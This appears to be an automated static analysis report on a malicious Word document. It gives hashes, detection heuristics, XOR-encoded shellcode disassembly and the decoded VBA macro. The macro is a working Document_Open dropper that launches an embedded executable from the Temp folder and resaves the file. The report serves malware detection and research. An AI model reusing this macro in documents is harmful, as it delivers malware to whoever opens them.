Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f53dca35a2cdb70f…

MALICIOUS

Office (OLE)

193.9 KB Created: 2018-03-21 11:47:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: ca1c41142ba9527d0d2c27a4687a0061 SHA-1: 1440bf5c15c76462d1dafe1b71ce2404cfbb0333 SHA-256: f53dca35a2cdb70f11dee9ad7f951de0eb6e9d2f1bcb4bb12450e6f1ae2c33a4
478 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes a file named '1.exe' from the user's temporary directory using the Shell() function. This is further supported by heuristics indicating the presence of VBA macros, a Document_Open macro, and a Shell() call. The Ole10Native package also indicates that an executable payload is dropped.

Heuristics 14

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Doc.Dropper.Agent-6520359-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6520359-0
  • XOR-encoded strings (key 0xDC) critical SC_XOR_ENCODED
    Found 3 Windows library/API name(s) XOR-encoded with single-byte key 0xDC: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'
    Disassembly
    x86 disassembly · validity: uncertain (0.593) — no internal branches to corroborate control flow
    000189FF  90                nop
00018A00  b3bd              mov bl, 0xbd
00018A02  b890b5beae        mov eax, 0xaebeb590
00018A07  bdaea59ddc        mov ebp, 0xdc9da5ae
00018A0C  5f                pop edi
00018A0D  1cdf              sbb al, 0xdf
00018A0F  55                push ebp
00018A10  59                pop ecx
00018A11  c02323            shl byte ptr [ebx], 0x23
00018A14  23845759c02323    and eax, dword ptr [edi + edx*2 + 0x2323c059]
00018A1B  238c57912c8d23    and ecx, dword ptr [edi + edx*2 + 0x238d2c91]
00018A22  8900              mov dword ptr [eax], eax
00018A24  55                push ebp
00018A25  59                pop ecx
00018A26  e423              in al, 0x23
00018A28  2323              and esp, dword ptr [ebx]
00018A2A  8c                .byte 0x8c
00018A2B  34dc              xor al, 0xdc
00018A2D  dc                .byte 0xdc
00018A2E  dc                .byte 0xdc
00018A2F  dc8437d18ab5ae    fadd qword ptr [edi + esi - 0x514a752f]
00018A36  a8a9              test al, 0xa9
00018A38  bdb09db0b0        mov ebp, 0xb0b09db0
00018A3D  b3bf              mov bl, 0xbf
00018A3F  dc5f1c            fcomp qword ptr [edi + 0x1c]
00018A42  df5559            fist word ptr [ebp + 0x59]
00018A45  e023              loopne 0x18a6a
00018A47  2323              and esp, dword ptr [ebx]
00018A49  845749            test byte ptr [edi + 0x49], dl
00018A4C  e023              loopne 0x18a71
00018A4E  2323              and esp, dword ptr [ebx]
00018A50  8e5799            mov ss, word ptr [edi - 0x67]
00018A53  2c8c              sub al, 0x8c
00018A55  238900559960      and ecx, dword ptr [ecx + 0x60995500]
00018A5B  8c                .byte 0x8c
00018A5C  34dc              xor al, 0xdc
00018A5E  dc                .byte 0xdc
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell Environ("Temp") & "\1.exe", vbNormal
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Shell Environ("Temp") & "\1.exe", vbNormal
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 998 bytes
SHA-256: c12dfeabe214ff474a91c1288da04b5dbbbf9dfa62a7c418199529b14224ece5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.DisplayAlerts = False
Dim Str As String

    Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveDown Unit:=wdScreen, Count:=7
    Selection.MoveRight Unit:=wdCharacter, Count:=13
    Selection.TypeBackspace
    Selection.Copy
    
   
Shell Environ("Temp") & "\1.exe", vbNormal
Selection.TypeBackspace
 Set d = New DataObject
    d.SetText " "
    d.PutInClipboard
    Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveUp Unit:=wdScreen, Count:=7
    Selection.MoveLeft Unit:=wdCharacter, Count:=13
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
End Sub
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1584451364/Ole10Native 92427 bytes
SHA-256: 3c7c43b9162c792145de0ff6ce32882d97f67d53ffcfb9e6259d6218589f4962
ole10native_00_1.exe ole-package-payload OLE Ole10Native payload: ObjectPool/_1584451364/Ole10Native; display_name=1.exe; full_path=C:\Users\win7home\AppData\Local\Temp\1.exe; temp_path=; def_file= 92160 bytes
SHA-256: a5d2845db495d379769c4039941098be46ecd8e85e4c23bfe8f44ad466840927

Open this report in the interactive analyzer, or submit your own file for analysis.